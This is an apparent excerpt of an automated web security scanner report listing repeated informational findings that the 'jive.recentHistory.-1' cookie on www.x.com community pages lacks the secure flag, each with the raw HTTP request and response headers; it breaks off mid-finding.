Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.8. https://www.x.com/community/ppx/apps101

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.9. https://www.x.com/community/ppx/authentication

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.10. https://www.x.com/community/ppx/businesspayments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.11. https://www.x.com/community/ppx/button_manager

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.12. https://www.x.com/community/ppx/code_samples

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.13. https://www.x.com/community/ppx/dev-tools

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.14. https://www.x.com/community/ppx/dev-tools/decision_tree

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.15. https://www.x.com/community/ppx/devchallenge

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.16. https://www.x.com/community/ppx/devchallenge/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.17. https://www.x.com/community/ppx/developer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.18. https://www.x.com/community/ppx/devtalk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.19. https://www.x.com/community/ppx/devzone

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.20. https://www.x.com/community/ppx/documentation

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.21. https://www.x.com/community/ppx/ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.22. https://www.x.com/community/ppx/feedback

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.23. https://www.x.com/community/ppx/fundraising

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.24. https://www.x.com/community/ppx/global

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.25. https://www.x.com/community/ppx/global/au

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.26. https://www.x.com/community/ppx/global/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
